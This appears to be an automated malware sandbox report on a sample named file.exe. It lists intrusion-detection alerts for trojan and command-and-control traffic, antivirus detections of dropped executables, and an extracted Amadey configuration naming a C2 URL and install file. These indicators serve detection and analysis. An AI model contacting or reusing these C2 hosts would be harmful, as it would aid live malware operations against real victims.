                      2024-12-12T16:50:52.876874+010020546531A Network Trojan was detected192.168.2.1050308172.67.213.48443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:50:29.760539+010020498361A Network Trojan was detected192.168.2.1050238172.67.213.48443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:50:34.198263+010020498121A Network Trojan was detected192.168.2.1050259172.67.213.48443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:50:28.617180+010020581601Domain Observed Used for C2 Detected192.168.2.1050238172.67.213.48443TCP
                      2024-12-12T16:50:33.485834+010020581601Domain Observed Used for C2 Detected192.168.2.1050259172.67.213.48443TCP
                      2024-12-12T16:50:35.808854+010020581601Domain Observed Used for C2 Detected192.168.2.1050263172.67.213.48443TCP
                      2024-12-12T16:50:37.870851+010020581601Domain Observed Used for C2 Detected192.168.2.1050267172.67.213.48443TCP
                      2024-12-12T16:50:40.450539+010020581601Domain Observed Used for C2 Detected192.168.2.1050271172.67.213.48443TCP
                      2024-12-12T16:50:43.338354+010020581601Domain Observed Used for C2 Detected192.168.2.1050284172.67.213.48443TCP
                      2024-12-12T16:50:49.617379+010020581601Domain Observed Used for C2 Detected192.168.2.1050299172.67.213.48443TCP
                      2024-12-12T16:50:52.161845+010020581601Domain Observed Used for C2 Detected192.168.2.1050308172.67.213.48443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:57.758591+010020432341A Network Trojan was detected185.81.68.1471912192.168.2.1049987TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:57.323492+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:02.860674+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:03.835156+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:04.588176+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:05.941811+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:06.524367+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:07.098867+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:09.311065+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:09.751202+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:10.283805+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:10.734934+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:11.728022+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:12.169561+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:12.607750+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:13.048307+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:13.603022+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:13.758647+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:14.210076+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:14.648312+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:15.084665+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:15.555208+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:16.095366+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:16.215903+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:17.575686+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:18.012627+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      2024-12-12T16:49:18.518179+010020432311A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:03.298149+010020460561A Network Trojan was detected185.81.68.1471912192.168.2.1049987TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:42.321382+010020197142Potentially Bad Traffic192.168.2.1049946185.81.68.14780TCP
                      2024-12-12T16:48:55.965003+010020197142Potentially Bad Traffic192.168.2.1049983185.81.68.14780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:37.185345+010020229851A Network Trojan was detected192.168.2.1049933185.81.68.14780TCP
                      2024-12-12T16:48:37.429929+010020229851A Network Trojan was detected192.168.2.1049938185.81.68.14780TCP
                      2024-12-12T16:48:39.209260+010020229851A Network Trojan was detected192.168.2.1049943185.81.68.14780TCP
                      2024-12-12T16:48:57.805054+010020229851A Network Trojan was detected192.168.2.1049989185.81.68.14780TCP
                      2024-12-12T16:48:58.053827+010020229851A Network Trojan was detected192.168.2.1049996185.81.68.14780TCP
                      2024-12-12T16:49:00.539654+010020229851A Network Trojan was detected192.168.2.1049998185.81.68.14780TCP
                      2024-12-12T16:49:00.782649+010020229851A Network Trojan was detected192.168.2.1050008185.81.68.14780TCP
                      2024-12-12T16:49:01.392290+010020229851A Network Trojan was detected192.168.2.1050011185.81.68.14780TCP
                      2024-12-12T16:49:03.271064+010020229851A Network Trojan was detected192.168.2.1050017185.81.68.14780TCP
                      2024-12-12T16:49:05.207591+010020229851A Network Trojan was detected192.168.2.1050021185.81.68.14780TCP
                      2024-12-12T16:49:07.246330+010020229851A Network Trojan was detected192.168.2.1050030185.81.68.14780TCP
                      2024-12-12T16:49:08.908525+010020229851A Network Trojan was detected192.168.2.1050034185.81.68.14780TCP
                      2024-12-12T16:49:10.703399+010020229851A Network Trojan was detected192.168.2.1050036185.81.68.14780TCP
                      2024-12-12T16:49:12.687511+010020229851A Network Trojan was detected192.168.2.1050038185.81.68.14780TCP
                      2024-12-12T16:49:14.392460+010020229851A Network Trojan was detected192.168.2.1050040185.81.68.14780TCP
                      2024-12-12T16:49:16.046870+010020229851A Network Trojan was detected192.168.2.1050041185.81.68.14780TCP
                      2024-12-12T16:49:17.891832+010020229851A Network Trojan was detected192.168.2.1050043185.81.68.14780TCP
                      2024-12-12T16:49:19.946252+010020229851A Network Trojan was detected192.168.2.1050045185.81.68.14780TCP
                      2024-12-12T16:49:22.019394+010020229851A Network Trojan was detected192.168.2.1050048185.81.68.14780TCP
                      2024-12-12T16:49:23.947453+010020229851A Network Trojan was detected192.168.2.1050050185.81.68.14780TCP
                      2024-12-12T16:49:25.845097+010020229851A Network Trojan was detected192.168.2.1050060185.81.68.14780TCP
                      2024-12-12T16:49:27.692012+010020229851A Network Trojan was detected192.168.2.1050061185.81.68.14780TCP
                      2024-12-12T16:49:29.585615+010020229851A Network Trojan was detected192.168.2.1050064185.81.68.14780TCP
                      2024-12-12T16:49:32.035333+010020229851A Network Trojan was detected192.168.2.1050067185.81.68.14780TCP
                      2024-12-12T16:49:32.277224+010020229851A Network Trojan was detected192.168.2.1050068185.81.68.14780TCP
                      2024-12-12T16:49:32.570048+010020229851A Network Trojan was detected192.168.2.1050070185.81.68.14780TCP
                      2024-12-12T16:49:34.388673+010020229851A Network Trojan was detected192.168.2.1050071185.81.68.14780TCP
                      2024-12-12T16:49:36.018645+010020229851A Network Trojan was detected192.168.2.1050072185.81.68.14780TCP
                      2024-12-12T16:49:36.259903+010020229851A Network Trojan was detected192.168.2.1050075185.81.68.14780TCP
                      2024-12-12T16:49:36.271923+010020229851A Network Trojan was detected192.168.2.1050076185.81.68.14780TCP
                      2024-12-12T16:49:38.318334+010020229851A Network Trojan was detected192.168.2.1050080185.81.68.14780TCP
                      2024-12-12T16:49:40.224291+010020229851A Network Trojan was detected192.168.2.1050085185.81.68.14780TCP
                      2024-12-12T16:49:42.123906+010020229851A Network Trojan was detected192.168.2.1050091185.81.68.14780TCP
                      2024-12-12T16:49:43.896529+010020229851A Network Trojan was detected192.168.2.1050104185.81.68.14780TCP
                      2024-12-12T16:49:45.761525+010020229851A Network Trojan was detected192.168.2.1050120185.81.68.14780TCP
                      2024-12-12T16:49:47.592431+010020229851A Network Trojan was detected192.168.2.1050124185.81.68.14780TCP
                      2024-12-12T16:49:49.279394+010020229851A Network Trojan was detected192.168.2.1050127185.81.68.14780TCP
                      2024-12-12T16:49:51.229821+010020229851A Network Trojan was detected192.168.2.1050128185.81.68.14780TCP
                      2024-12-12T16:49:53.073352+010020229851A Network Trojan was detected192.168.2.1050131185.81.68.14780TCP
                      2024-12-12T16:49:55.009969+010020229851A Network Trojan was detected192.168.2.1050134185.81.68.14780TCP
                      2024-12-12T16:49:56.698622+010020229851A Network Trojan was detected192.168.2.1050136185.81.68.14780TCP
                      2024-12-12T16:49:58.579931+010020229851A Network Trojan was detected192.168.2.1050139185.81.68.14780TCP
                      2024-12-12T16:50:00.279337+010020229851A Network Trojan was detected192.168.2.1050141185.81.68.14780TCP
                      2024-12-12T16:50:02.307286+010020229851A Network Trojan was detected192.168.2.1050146185.81.68.14780TCP
                      2024-12-12T16:50:04.012827+010020229851A Network Trojan was detected192.168.2.1050148185.81.68.14780TCP
                      2024-12-12T16:50:04.214882+010020229851A Network Trojan was detected192.168.2.1050147185.81.68.14780TCP
                      2024-12-12T16:50:04.464069+010020229851A Network Trojan was detected192.168.2.1050150185.81.68.14780TCP
                      2024-12-12T16:50:06.015974+010020229851A Network Trojan was detected192.168.2.1050156185.81.68.14780TCP
                      2024-12-12T16:50:08.068063+010020229851A Network Trojan was detected192.168.2.1050165185.81.68.14780TCP
                      2024-12-12T16:50:08.956599+010020229851A Network Trojan was detected192.168.2.1050164185.81.68.14780TCP
                      2024-12-12T16:50:09.269536+010020229851A Network Trojan was detected192.168.2.1050174185.81.68.14780TCP
                      2024-12-12T16:50:09.904036+010020229851A Network Trojan was detected192.168.2.1050176185.81.68.14780TCP
                      2024-12-12T16:50:11.742161+010020229851A Network Trojan was detected192.168.2.1050182185.81.68.14780TCP
                      2024-12-12T16:50:13.465562+010020229851A Network Trojan was detected192.168.2.1050184185.81.68.14780TCP
                      2024-12-12T16:50:15.152143+010020229851A Network Trojan was detected192.168.2.1050192185.81.68.14780TCP
                      2024-12-12T16:50:17.071221+010020229851A Network Trojan was detected192.168.2.1050195185.81.68.14780TCP
                      2024-12-12T16:50:19.044987+010020229851A Network Trojan was detected192.168.2.1050196185.81.68.14780TCP
                      2024-12-12T16:50:20.988187+010020229851A Network Trojan was detected192.168.2.1050202185.81.68.14780TCP
                      2024-12-12T16:50:22.890926+010020229851A Network Trojan was detected192.168.2.1050207185.81.68.14780TCP
                      2024-12-12T16:50:24.882642+010020229851A Network Trojan was detected192.168.2.1050221185.81.68.14780TCP
                      2024-12-12T16:50:26.627266+010020229851A Network Trojan was detected192.168.2.1050233185.81.68.14780TCP
                      2024-12-12T16:50:28.320557+010020229851A Network Trojan was detected192.168.2.1050243185.81.68.14780TCP
                      2024-12-12T16:50:30.297076+010020229851A Network Trojan was detected192.168.2.1050254185.81.68.14780TCP
                      2024-12-12T16:50:32.183845+010020229851A Network Trojan was detected192.168.2.1050258185.81.68.14780TCP
                      2024-12-12T16:50:34.064096+010020229851A Network Trojan was detected192.168.2.1050261185.81.68.14780TCP
                      2024-12-12T16:50:35.876600+010020229851A Network Trojan was detected192.168.2.1050265185.81.68.14780TCP
                      2024-12-12T16:50:37.750819+010020229851A Network Trojan was detected192.168.2.1050268185.81.68.14780TCP
                      2024-12-12T16:50:39.704101+010020229851A Network Trojan was detected192.168.2.1050272185.81.68.14780TCP
                      2024-12-12T16:50:41.581306+010020229851A Network Trojan was detected192.168.2.1050275185.81.68.14780TCP
                      2024-12-12T16:50:43.584964+010020229851A Network Trojan was detected192.168.2.1050288185.81.68.14780TCP
                      2024-12-12T16:50:45.346981+010020229851A Network Trojan was detected192.168.2.1050294185.81.68.14780TCP
                      2024-12-12T16:50:47.034246+010020229851A Network Trojan was detected192.168.2.1050296185.81.68.14780TCP
                      2024-12-12T16:50:48.854420+010020229851A Network Trojan was detected192.168.2.1050300185.81.68.14780TCP
                      2024-12-12T16:50:50.537748+010020229851A Network Trojan was detected192.168.2.1050302185.81.68.14780TCP
                      2024-12-12T16:50:52.370878+010020229851A Network Trojan was detected192.168.2.1050311185.81.68.14780TCP
                      2024-12-12T16:50:54.079049+010020229851A Network Trojan was detected192.168.2.1050316185.81.68.14780TCP
                      2024-12-12T16:50:55.996365+010020229851A Network Trojan was detected192.168.2.1050319185.81.68.14780TCP
                      2024-12-12T16:50:57.999225+010020229851A Network Trojan was detected192.168.2.1050329185.81.68.14780TCP
                      2024-12-12T16:50:59.837977+010020229851A Network Trojan was detected192.168.2.1050330185.81.68.14780TCP
                      2024-12-12T16:51:01.617885+010020229851A Network Trojan was detected192.168.2.1050332185.81.68.14780TCP
                      2024-12-12T16:51:07.739107+010020229851A Network Trojan was detected192.168.2.1050337185.81.68.14780TCP
                      2024-12-12T16:51:09.658808+010020229851A Network Trojan was detected192.168.2.1050339185.81.68.14780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:37.185345+010020179301A Network Trojan was detected192.168.2.1049933185.81.68.14780TCP
                      2024-12-12T16:48:37.429929+010020179301A Network Trojan was detected192.168.2.1049938185.81.68.14780TCP
                      2024-12-12T16:48:39.209260+010020179301A Network Trojan was detected192.168.2.1049943185.81.68.14780TCP
                      2024-12-12T16:48:57.805054+010020179301A Network Trojan was detected192.168.2.1049989185.81.68.14780TCP
                      2024-12-12T16:48:58.053827+010020179301A Network Trojan was detected192.168.2.1049996185.81.68.14780TCP
                      2024-12-12T16:49:00.539654+010020179301A Network Trojan was detected192.168.2.1049998185.81.68.14780TCP
                      2024-12-12T16:49:00.782649+010020179301A Network Trojan was detected192.168.2.1050008185.81.68.14780TCP
                      2024-12-12T16:49:01.392290+010020179301A Network Trojan was detected192.168.2.1050011185.81.68.14780TCP
                      2024-12-12T16:49:03.271064+010020179301A Network Trojan was detected192.168.2.1050017185.81.68.14780TCP
                      2024-12-12T16:49:05.207591+010020179301A Network Trojan was detected192.168.2.1050021185.81.68.14780TCP
                      2024-12-12T16:49:07.246330+010020179301A Network Trojan was detected192.168.2.1050030185.81.68.14780TCP
                      2024-12-12T16:49:08.908525+010020179301A Network Trojan was detected192.168.2.1050034185.81.68.14780TCP
                      2024-12-12T16:49:10.703399+010020179301A Network Trojan was detected192.168.2.1050036185.81.68.14780TCP
                      2024-12-12T16:49:12.687511+010020179301A Network Trojan was detected192.168.2.1050038185.81.68.14780TCP
                      2024-12-12T16:49:14.392460+010020179301A Network Trojan was detected192.168.2.1050040185.81.68.14780TCP
                      2024-12-12T16:49:16.046870+010020179301A Network Trojan was detected192.168.2.1050041185.81.68.14780TCP
                      2024-12-12T16:49:17.891832+010020179301A Network Trojan was detected192.168.2.1050043185.81.68.14780TCP
                      2024-12-12T16:49:19.946252+010020179301A Network Trojan was detected192.168.2.1050045185.81.68.14780TCP
                      2024-12-12T16:49:22.019394+010020179301A Network Trojan was detected192.168.2.1050048185.81.68.14780TCP
                      2024-12-12T16:49:23.947453+010020179301A Network Trojan was detected192.168.2.1050050185.81.68.14780TCP
                      2024-12-12T16:49:25.845097+010020179301A Network Trojan was detected192.168.2.1050060185.81.68.14780TCP
                      2024-12-12T16:49:27.692012+010020179301A Network Trojan was detected192.168.2.1050061185.81.68.14780TCP
                      2024-12-12T16:49:29.585615+010020179301A Network Trojan was detected192.168.2.1050064185.81.68.14780TCP
                      2024-12-12T16:49:32.035333+010020179301A Network Trojan was detected192.168.2.1050067185.81.68.14780TCP
                      2024-12-12T16:49:32.277224+010020179301A Network Trojan was detected192.168.2.1050068185.81.68.14780TCP
                      2024-12-12T16:49:32.570048+010020179301A Network Trojan was detected192.168.2.1050070185.81.68.14780TCP
                      2024-12-12T16:49:34.388673+010020179301A Network Trojan was detected192.168.2.1050071185.81.68.14780TCP
                      2024-12-12T16:49:36.018645+010020179301A Network Trojan was detected192.168.2.1050072185.81.68.14780TCP
                      2024-12-12T16:49:36.259903+010020179301A Network Trojan was detected192.168.2.1050075185.81.68.14780TCP
                      2024-12-12T16:49:36.271923+010020179301A Network Trojan was detected192.168.2.1050076185.81.68.14780TCP
                      2024-12-12T16:49:38.318334+010020179301A Network Trojan was detected192.168.2.1050080185.81.68.14780TCP
                      2024-12-12T16:49:40.224291+010020179301A Network Trojan was detected192.168.2.1050085185.81.68.14780TCP
                      2024-12-12T16:49:42.123906+010020179301A Network Trojan was detected192.168.2.1050091185.81.68.14780TCP
                      2024-12-12T16:49:43.896529+010020179301A Network Trojan was detected192.168.2.1050104185.81.68.14780TCP
                      2024-12-12T16:49:45.761525+010020179301A Network Trojan was detected192.168.2.1050120185.81.68.14780TCP
                      2024-12-12T16:49:47.592431+010020179301A Network Trojan was detected192.168.2.1050124185.81.68.14780TCP
                      2024-12-12T16:49:49.279394+010020179301A Network Trojan was detected192.168.2.1050127185.81.68.14780TCP
                      2024-12-12T16:49:51.229821+010020179301A Network Trojan was detected192.168.2.1050128185.81.68.14780TCP
                      2024-12-12T16:49:53.073352+010020179301A Network Trojan was detected192.168.2.1050131185.81.68.14780TCP
                      2024-12-12T16:49:55.009969+010020179301A Network Trojan was detected192.168.2.1050134185.81.68.14780TCP
                      2024-12-12T16:49:56.698622+010020179301A Network Trojan was detected192.168.2.1050136185.81.68.14780TCP
                      2024-12-12T16:49:58.579931+010020179301A Network Trojan was detected192.168.2.1050139185.81.68.14780TCP
                      2024-12-12T16:50:00.279337+010020179301A Network Trojan was detected192.168.2.1050141185.81.68.14780TCP
                      2024-12-12T16:50:02.307286+010020179301A Network Trojan was detected192.168.2.1050146185.81.68.14780TCP
                      2024-12-12T16:50:04.012827+010020179301A Network Trojan was detected192.168.2.1050148185.81.68.14780TCP
                      2024-12-12T16:50:04.214882+010020179301A Network Trojan was detected192.168.2.1050147185.81.68.14780TCP
                      2024-12-12T16:50:04.464069+010020179301A Network Trojan was detected192.168.2.1050150185.81.68.14780TCP
                      2024-12-12T16:50:06.015974+010020179301A Network Trojan was detected192.168.2.1050156185.81.68.14780TCP
                      2024-12-12T16:50:08.068063+010020179301A Network Trojan was detected192.168.2.1050165185.81.68.14780TCP
                      2024-12-12T16:50:08.956599+010020179301A Network Trojan was detected192.168.2.1050164185.81.68.14780TCP
                      2024-12-12T16:50:09.269536+010020179301A Network Trojan was detected192.168.2.1050174185.81.68.14780TCP
                      2024-12-12T16:50:09.904036+010020179301A Network Trojan was detected192.168.2.1050176185.81.68.14780TCP
                      2024-12-12T16:50:11.742161+010020179301A Network Trojan was detected192.168.2.1050182185.81.68.14780TCP
                      2024-12-12T16:50:13.465562+010020179301A Network Trojan was detected192.168.2.1050184185.81.68.14780TCP
                      2024-12-12T16:50:15.152143+010020179301A Network Trojan was detected192.168.2.1050192185.81.68.14780TCP
                      2024-12-12T16:50:17.071221+010020179301A Network Trojan was detected192.168.2.1050195185.81.68.14780TCP
                      2024-12-12T16:50:19.044987+010020179301A Network Trojan was detected192.168.2.1050196185.81.68.14780TCP
                      2024-12-12T16:50:20.988187+010020179301A Network Trojan was detected192.168.2.1050202185.81.68.14780TCP
                      2024-12-12T16:50:22.890926+010020179301A Network Trojan was detected192.168.2.1050207185.81.68.14780TCP
                      2024-12-12T16:50:24.882642+010020179301A Network Trojan was detected192.168.2.1050221185.81.68.14780TCP
                      2024-12-12T16:50:26.627266+010020179301A Network Trojan was detected192.168.2.1050233185.81.68.14780TCP
                      2024-12-12T16:50:28.320557+010020179301A Network Trojan was detected192.168.2.1050243185.81.68.14780TCP
                      2024-12-12T16:50:30.297076+010020179301A Network Trojan was detected192.168.2.1050254185.81.68.14780TCP
                      2024-12-12T16:50:32.183845+010020179301A Network Trojan was detected192.168.2.1050258185.81.68.14780TCP
                      2024-12-12T16:50:34.064096+010020179301A Network Trojan was detected192.168.2.1050261185.81.68.14780TCP
                      2024-12-12T16:50:35.876600+010020179301A Network Trojan was detected192.168.2.1050265185.81.68.14780TCP
                      2024-12-12T16:50:37.750819+010020179301A Network Trojan was detected192.168.2.1050268185.81.68.14780TCP
                      2024-12-12T16:50:39.704101+010020179301A Network Trojan was detected192.168.2.1050272185.81.68.14780TCP
                      2024-12-12T16:50:41.581306+010020179301A Network Trojan was detected192.168.2.1050275185.81.68.14780TCP
                      2024-12-12T16:50:43.584964+010020179301A Network Trojan was detected192.168.2.1050288185.81.68.14780TCP
                      2024-12-12T16:50:45.346981+010020179301A Network Trojan was detected192.168.2.1050294185.81.68.14780TCP
                      2024-12-12T16:50:47.034246+010020179301A Network Trojan was detected192.168.2.1050296185.81.68.14780TCP
                      2024-12-12T16:50:48.854420+010020179301A Network Trojan was detected192.168.2.1050300185.81.68.14780TCP
                      2024-12-12T16:50:50.537748+010020179301A Network Trojan was detected192.168.2.1050302185.81.68.14780TCP
                      2024-12-12T16:50:52.370878+010020179301A Network Trojan was detected192.168.2.1050311185.81.68.14780TCP
                      2024-12-12T16:50:54.079049+010020179301A Network Trojan was detected192.168.2.1050316185.81.68.14780TCP
                      2024-12-12T16:50:55.996365+010020179301A Network Trojan was detected192.168.2.1050319185.81.68.14780TCP
                      2024-12-12T16:50:57.999225+010020179301A Network Trojan was detected192.168.2.1050329185.81.68.14780TCP
                      2024-12-12T16:50:59.837977+010020179301A Network Trojan was detected192.168.2.1050330185.81.68.14780TCP
                      2024-12-12T16:51:01.617885+010020179301A Network Trojan was detected192.168.2.1050332185.81.68.14780TCP
                      2024-12-12T16:51:07.739107+010020179301A Network Trojan was detected192.168.2.1050337185.81.68.14780TCP
                      2024-12-12T16:51:09.658808+010020179301A Network Trojan was detected192.168.2.1050339185.81.68.14780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:56.281784+010020010463Misc activity185.81.68.14780192.168.2.1049983TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:16.237759+010020446961A Network Trojan was detected192.168.2.1049868185.215.113.4380TCP
                      2024-12-12T16:48:22.811575+010020446961A Network Trojan was detected192.168.2.1049884185.215.113.4380TCP
                      2024-12-12T16:48:29.278884+010020446961A Network Trojan was detected192.168.2.1049904185.215.113.4380TCP
                      2024-12-12T16:48:35.207517+010020446961A Network Trojan was detected192.168.2.1049926185.215.113.4380TCP
                      2024-12-12T16:48:44.289301+010020446961A Network Trojan was detected192.168.2.1049951185.215.113.4380TCP
                      2024-12-12T16:48:51.420975+010020446961A Network Trojan was detected192.168.2.1049970185.215.113.4380TCP
                      2024-12-12T16:49:00.649649+010020446961A Network Trojan was detected192.168.2.1049999185.215.113.4380TCP
                      2024-12-12T16:49:10.575372+010020446961A Network Trojan was detected192.168.2.1050035185.215.113.4380TCP
                      2024-12-12T16:49:29.345278+010020446961A Network Trojan was detected192.168.2.1050063185.215.113.4380TCP
                      2024-12-12T16:49:39.185191+010020446961A Network Trojan was detected192.168.2.1050078185.215.113.4380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:50:26.874704+010020581591Domain Observed Used for C2 Detected192.168.2.10597211.1.1.153UDP
                      2024-12-12T16:50:27.130932+010020581591Domain Observed Used for C2 Detected192.168.2.10597211.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:08.701832+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.1050024TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:08.248085+010020442441Malware Command and Control Activity Detected192.168.2.1050024185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:09.021402+010020442461Malware Command and Control Activity Detected192.168.2.1050024185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:10.669752+010020442481Malware Command and Control Activity Detected192.168.2.1050024185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:09.219283+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.1050024TCP
                      2024-12-12T16:49:40.059724+010020442471Malware Command and Control Activity Detected116.203.10.31443192.168.2.1050079TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:42.846309+010020518311Malware Command and Control Activity Detected116.203.10.31443192.168.2.1050088TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:40.059485+010020490871A Network Trojan was detected192.168.2.1050079116.203.10.31443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:57.323492+010020460451A Network Trojan was detected192.168.2.1049987185.81.68.1471912TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:50:39.014059+010020480941Malware Command and Control Activity Detected192.168.2.1050267172.67.213.48443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:07.724825+010020442431Malware Command and Control Activity Detected192.168.2.1050024185.215.113.20680TCP
                      2024-12-12T16:50:24.214168+010020442431Malware Command and Control Activity Detected192.168.2.1050205185.215.113.20680TCP
                      2024-12-12T16:50:32.280880+010020442431Malware Command and Control Activity Detected192.168.2.1050255185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:06.778525+010028561471A Network Trojan was detected192.168.2.1049848185.215.113.4380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:14.896120+010028561221A Network Trojan was detected185.215.113.4380192.168.2.1049856TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:48:11.236305+010028033053Unknown Traffic192.168.2.104985831.41.244.1180TCP
                      2024-12-12T16:48:17.714552+010028033053Unknown Traffic192.168.2.104987231.41.244.1180TCP
                      2024-12-12T16:48:24.265874+010028033053Unknown Traffic192.168.2.104989031.41.244.1180TCP
                      2024-12-12T16:48:30.727587+010028033053Unknown Traffic192.168.2.104991231.41.244.1180TCP
                      2024-12-12T16:48:36.675555+010028033053Unknown Traffic192.168.2.104993131.41.244.1180TCP
                      2024-12-12T16:48:45.752757+010028033053Unknown Traffic192.168.2.1049957185.215.113.1680TCP
                      2024-12-12T16:48:53.217233+010028033053Unknown Traffic192.168.2.1049975185.215.113.1680TCP
                      2024-12-12T16:49:02.146006+010028033053Unknown Traffic192.168.2.1050010185.215.113.1680TCP
                      2024-12-12T16:49:12.109274+010028033053Unknown Traffic192.168.2.105003731.41.244.1180TCP
                      2024-12-12T16:49:14.712528+010028033053Unknown Traffic192.168.2.105003931.41.244.1180TCP
                      2024-12-12T16:49:24.329585+010028033053Unknown Traffic192.168.2.105004931.41.244.1180TCP
                      2024-12-12T16:49:30.848414+010028033053Unknown Traffic192.168.2.105006531.41.244.1180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:49:12.076552+010028033043Unknown Traffic192.168.2.1050024185.215.113.20680TCP
                      2024-12-12T16:49:44.305053+010028033043Unknown Traffic192.168.2.1050084185.215.113.20680TCP
                      2024-12-12T16:49:46.315458+010028033043Unknown Traffic192.168.2.1050084185.215.113.20680TCP
                      2024-12-12T16:49:48.646766+010028033043Unknown Traffic192.168.2.1050084185.215.113.20680TCP
                      2024-12-12T16:49:50.303983+010028033043Unknown Traffic192.168.2.1050084185.215.113.20680TCP
                      2024-12-12T16:49:55.712604+010028033043Unknown Traffic192.168.2.1050084185.215.113.20680TCP
                      2024-12-12T16:49:56.940429+010028033043Unknown Traffic192.168.2.1050084185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T16:50:50.833525+010028438641A Network Trojan was detected192.168.2.1050299172.67.213.48443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: file.exeAvira: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exeAvira: detection malicious, Label: HEUR/AGEN.1306956
                      Source: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
